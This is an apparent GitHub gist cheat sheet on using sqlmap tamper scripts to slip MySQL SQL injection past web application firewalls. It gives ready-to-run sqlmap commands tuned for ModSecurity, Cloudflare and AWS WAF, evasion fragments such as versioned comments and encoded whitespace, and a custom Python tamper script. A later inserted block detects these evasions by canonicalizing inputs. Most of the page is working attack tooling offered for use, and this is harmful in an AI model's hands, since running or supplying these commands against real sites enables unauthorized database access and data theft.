@random-robbie
Created February 10, 2026 21:18
best tamper scripts for mysql for sqlmap

Essential MySQL Tamper Scripts

Most Effective General Purpose:

--tamper=between,randomcase,space2comment

  • between - Replaces > with NOT BETWEEN 0 AND # and = with BETWEEN # AND #
  • randomcase - Randomizes case of keywords (bypass case-sensitive filters)
  • space2comment - Replaces spaces with /**/ comments

For WAF/Filter Bypass:

Strong WAF bypass combo

--tamper=between,charencode,charunicodeencode,randomcase,space2comment

Alternative for strict filters

--tamper=space2hash,between,greatest,charencode

Specific MySQL Tamper Scripts:

┌───────────────────────┬──────────────────────────────────┬────────────────────────────────┐
│ Script                │ Purpose                          │ Example                        │
├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤
│ space2comment         │ Replace space with /**/          │ SELECT/**/FROM                 │
│ space2hash            │ Replace space with # + newline   │ SELECT#%0AFROM                 │
│ space2plus            │ Replace space with +             │ SELECT+FROM                    │
│ between               │ Replace comparators              │ id>1 → id NOT BETWEEN 0 AND 1  │
│ greatest              │ Replace > with GREATEST          │ id>1 → GREATEST(id,1)=id       │
│ ifnull2ifisnull       │ Replace IFNULL with IF(ISNULL    │ MySQL-specific syntax          │
│ randomcase            │ Randomize case                   │ SELECT → SeLeCt                │
│ charencode            │ URL encode characters            │ ' → %27                        │
│ charunicodeencode     │ Unicode encode                   │ SELECT → %u0053%u0045%u004C... │
│ versionedkeywords     │ Add MySQL version comments       │ SELECT → /*!50000SELECT*/      │
│ versionedmorekeywords │ More aggressive version comments │ Bypasses strict parsers        │
└───────────────────────┴──────────────────────────────────┴────────────────────────────────┘

Recommended Combinations by Scenario:

  1. ModSecurity/Generic WAF:

sqlmap -u "URL" --tamper=space2comment,between,randomcase,charencode --level=5 --risk=3

  2. Cloudflare WAF:

sqlmap -u "URL" --tamper=between,charencode,charunicodeencode,equaltolike,space2comment --random-agent

  3. AWS WAF:

sqlmap -u "URL" --tamper=space2hash,between,greatest,randomcase

  4. Custom PHP/Python Filters:

sqlmap -u "URL" --tamper=between,charencode,randomcase,space2comment,greatest

  5. Strict Input Validation:

sqlmap -u "URL" --tamper=versionedkeywords,versionedmorekeywords,between,space2comment

MySQL-Specific Advanced Techniques:

Version Comment Bypass:

/*!50000SELECT*/ /*!50000FROM*/ /*!50000users*/

Use: --tamper=versionedkeywords

Whitespace Alternatives:

SELECT/**/column/**/FROM/**/table
SELECT%0Acolumn%0AFROM%0Atable
SELECT%09column%09FROM%09table
SELECT+column+FROM+table

Function Alternatives:

-- Instead of SUBSTRING
MID(string, start, length)
SUBSTR(string, start, length)

-- Instead of ASCII
ORD(char)

-- Instead of IF
CASE WHEN condition THEN true ELSE false END
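Added example, not part of the original gist: the detection-side consequence of the transformations listed above is that signatures have to be matched after canonicalization, not on the raw parameter value. The sketch below reverses the encodings and comment forms named on this page and then applies two signatures; the signature list, function names and sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Illustrative signatures only (assumption); real rule sets are far larger.
SIGNATURES = [
    re.compile(r"\bunion\s+(all\s+)?select\b"),
    re.compile(r"\b(and|or)\s+\d+\s*(=|between)\s*\d+"),
]

def canonicalize(value, max_rounds=3):
    """Reduce a parameter value to the form MySQL would effectively parse."""
    for _ in range(max_rounds):  # repeat to unwrap double encoding
        previous = value
        # charunicodeencode: %uXXXX is not handled by unquote, decode it first
        value = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)
        # charencode / whitespace alternatives: %27, %0A, %09, and + as space
        value = unquote_plus(value)
        if value == previous:
            break
    # versionedkeywords: MySQL executes the body of /*!50000...*/, so keep it
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # space2comment: plain /**/ comments act as whitespace
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # space2hash: '#' up to the newline is a comment
    value = re.sub(r"#[^\n]*\n", " ", value)
    # randomcase and tab/newline separators: fold case, collapse whitespace
    return re.sub(r"\s+", " ", value).strip().lower()

# Baseline: signature match on the raw value, lower-cased only
def naive_match(value):
    return any(sig.search(value.lower()) for sig in SIGNATURES)

def canonical_match(value):
    canon = canonicalize(value)
    return any(sig.search(canon) for sig in SIGNATURES)

# Constructed sample parameter values, one per technique
SAMPLES = {
    "space2comment+randomcase": "1/**/UnIoN/**/SeLeCt/**/1,2",
    "versionedkeywords": "1+/*!50000UNION*/+/*!50000SELECT*/+1,2",
    "charunicodeencode": "1 %u0055%u004E%u0049%u004F%u004E %u0053%u0045%u004C%u0045%u0043%u0054 1",
    "space2hash": "1%23xyz%0AUNION%23abc%0ASELECT%23q%0A1",
    "between": "1%09aNd%091%09BETWEEN%091%09AND%091",
    "benign": "Tom and Jerry, season 1",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:26} naive={naive_match(raw)!s:5} canonical={canonical_match(raw)}")
```

Repeated decoding over-normalizes some legitimate input (a literal + becomes a space), which is acceptable for matching but means the canonical form should never be passed on to the application.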

Custom Tamper Script (Most Effective):

Create /Users/r/.sqlmap/tamper/mysql_custom.py:

    #!/usr/bin/env python

    from lib.core.enums import PRIORITY

    # sqlmap reads the module-level __priority__ to order chained tamper scripts
    __priority__ = PRIORITY.NORMAL

    def dependencies():
        pass

    def tamper(payload, **kwargs):
        """
        Custom MySQL tamper combining best techniques
        """
        if payload:
            # Replace spaces with comments
            payload = payload.replace(" ", "/**/")

            # Alternate the case of SELECT, FROM, WHERE, AND, OR, UNION, NULL
            # (lower/upper by position, e.g. SELECT -> sElEcT)
            for keyword in ["SELECT", "FROM", "WHERE", "AND", "OR", "UNION", "NULL"]:
                payload = payload.replace(keyword, ''.join(
                    c.upper() if i % 2 else c.lower()
                    for i, c in enumerate(keyword)
                ))

            # Replace = with BETWEEN (only when the payload has a single "=")
            if "=" in payload and "!=" not in payload:
                parts = payload.split("=")
                if len(parts) == 2:
                    payload = f"{parts[0]}/**/BETWEEN/**/{parts[1]}/**/AND/**/{parts[1]}"

            # Add version comments around keywords; the spellings must match
            # the alternating case produced by the loop above
            for keyword in ["sElEcT", "fRoM", "wHeRe", "uNiOn"]:
                payload = payload.replace(keyword, f"/*!50000{keyword}*/")

        return payload

Usage: sqlmap -u "URL" --tamper=mysql_custom --batch

Pro Tips:

  1. Always use with level/risk: --level=5 --risk=3
  2. Chain multiple tampers: --tamper=script1,script2,script3
  3. Test tamper effectiveness: sqlmap -u "URL" --tamper=space2comment --test-filter="MySQL"
  4. For time-based blind: --tamper=between,space2comment --technique=T --time-sec=5
  5. Combine with other options: --random-agent --delay=2 --timeout=30 --retries=3